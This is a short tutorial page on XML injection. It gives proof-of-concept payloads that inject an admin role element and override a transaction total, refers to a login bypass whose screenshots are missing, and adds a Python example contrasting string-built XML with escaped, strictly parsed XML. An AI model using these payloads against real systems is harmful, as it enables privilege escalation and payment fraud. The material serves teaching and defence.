
XML Injection

Scenario 1:

Vulnerability:

<?xml version="1.0" encoding="UTF-8"?> <USER role="guest">attacker's code</USER>

poc:

A</USER><USER role="admin">B

Scenario 2:

Vulnerability:

[image]

After the value is changed to empty, the returned error reveals that loginid is used for the login check:

[image]

poc:

[image]

Result: the login is bypassed:

[image]

Scenario 3:

<transaction>
  <total>6000.00</total>
  <credit_card_number>12345</credit_card_number> <!-- 12345 is attacker-controlled and overrides the <total> tag -->
  <expiration>01012008</expiration>
</transaction>

poc:

12345</credit_card_number><total>1.00</total><credit_card_number>12345
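
The Scenario 3 document built two ways, as an added example that is not part of the original page: once by string formatting and once through an XML library that escapes the value, followed by a strict parser that rejects repeated fields. The function names and the "last `<total>` wins" consumer are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

# Card-number value from Scenario 3 on this page, used here as test input.
PAYLOAD = "12345</credit_card_number><total>1.00</total><credit_card_number>12345"
FIELDS = ("total", "credit_card_number", "expiration")


def build_vulnerable(total, card, expiration):
    """String formatting: markup inside a value becomes document structure."""
    return ("<transaction><total>%s</total>"
            "<credit_card_number>%s</credit_card_number>"
            "<expiration>%s</expiration></transaction>"
            % (total, card, expiration))


def build_hardened(total, card, expiration):
    """The XML library serializes values as text, escaping < > and &."""
    root = ET.Element("transaction")
    for tag, value in zip(FIELDS, (total, card, expiration)):
        ET.SubElement(root, tag).text = value
    return ET.tostring(root, encoding="unicode")


def last_total(xml_text):
    """Assumed lenient consumer: when <total> repeats, the last one wins."""
    return ET.fromstring(xml_text).findall("total")[-1].text


def parse_strict(xml_text):
    """Accept only a document with each expected field exactly once."""
    fields = {}
    for child in ET.fromstring(xml_text):
        if child.tag not in FIELDS or child.tag in fields:
            raise ValueError("unexpected or duplicate element: " + child.tag)
        fields[child.tag] = child.text
    if set(fields) != set(FIELDS):
        raise ValueError("missing element")
    return fields


if __name__ == "__main__":
    bad = build_vulnerable("6000.00", PAYLOAD, "01012008")
    good = build_hardened("6000.00", PAYLOAD, "01012008")
    print(last_total(bad))    # the injected <total> is read
    print(last_total(good))   # the original total survives
    try:
        parse_strict(bad)
    except ValueError as exc:
        print("rejected:", exc)
```
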